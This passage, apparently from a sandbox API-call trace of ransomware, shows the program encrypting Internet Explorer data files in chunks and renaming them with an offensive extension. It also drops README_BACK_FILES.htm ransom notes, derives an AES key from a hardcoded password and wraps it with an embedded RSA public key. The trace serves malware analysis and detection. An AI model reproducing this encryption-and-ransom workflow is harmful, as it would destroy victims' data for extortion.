| out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.739] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.739] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.740] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.740] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.740] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.740] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.740] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.740] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.740] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.741] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.741] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.741] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.741] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.741] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.741] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.742] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.742] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.742] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.742] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.742] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.743] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.743] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.743] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x2e0, lpOverlapped=0x0) returned 1 [0267.743] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x2e0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x2f0) returned 1 [0267.743] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x2f0, lpOverlapped=0x0) returned 1 [0267.743] CloseHandle (hObject=0x5d48) returned 1 [0267.743] CloseHandle (hObject=0x5d44) returned 1 [0267.743] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), bFailIfExists=0) returned 1 [0267.747] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT", dwFileAttributes=0x0) returned 1 [0267.748] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.gsg")) returned 1 [0267.749] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.fuck")) returned 1 [0267.751] CryptDestroyHash (hHash=0x2e7eb80) returned 1 [0267.751] CryptDestroyKey (hKey=0x2e7f3c0) returned 1 [0267.751] CryptReleaseContext (hProv=0x2f249c0, dwFlags=0x0) returned 1 [0267.751] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.751] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.766] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.766] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.766] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.766] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.766] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.767] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.767] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\readme_back_files.htm")) returned 0xffffffff [0267.767] AreFileApisANSI () returned 1 [0267.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0267.767] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.768] GetFileType (hFile=0x5d48) returned 0x1 [0267.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.770] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.770] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.772] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.772] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.772] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0267.772] GetLastError () returned 0x0 [0267.772] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat")) returned 0x20 [0267.772] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat", dwFileAttributes=0x80) returned 1 [0267.773] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0267.773] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{63e26eb7-6816-11e7-9bd2-c40142ecde47}.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.775] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{63E26EB7-6816-11E7-9BD2-C40142ECDE47}.dat.gsg", dwFileAttributes=0x2) returned 1 [0267.776] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f25020) returned 1 [0267.778] CryptCreateHash (in: hProv=0x2f25020, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0267.778] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0267.778] CryptHashData (hHash=0x2e7f8c0, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.778] CryptDeriveKey (in: hProv=0x2f25020, Algid=0x6610, hBaseData=0x2e7f8c0, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7f1c0) returned 1 [0267.778] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.778] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0267.778] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f24f10) returned 1 [0267.779] CryptImportPublicKeyInfo (in: hCryptProv=0x2f24f10, dwCertEncodingType=0x1, pInfo=0x2f30550*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30580*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30588*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7f200) returned 1 [0267.779] CryptEncrypt (in: hKey=0x2e7f200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0267.779] CryptEncrypt (in: hKey=0x2e7f200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24f98*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f24f98*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0267.779] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f24f98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f24f98*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0267.781] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.793] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, 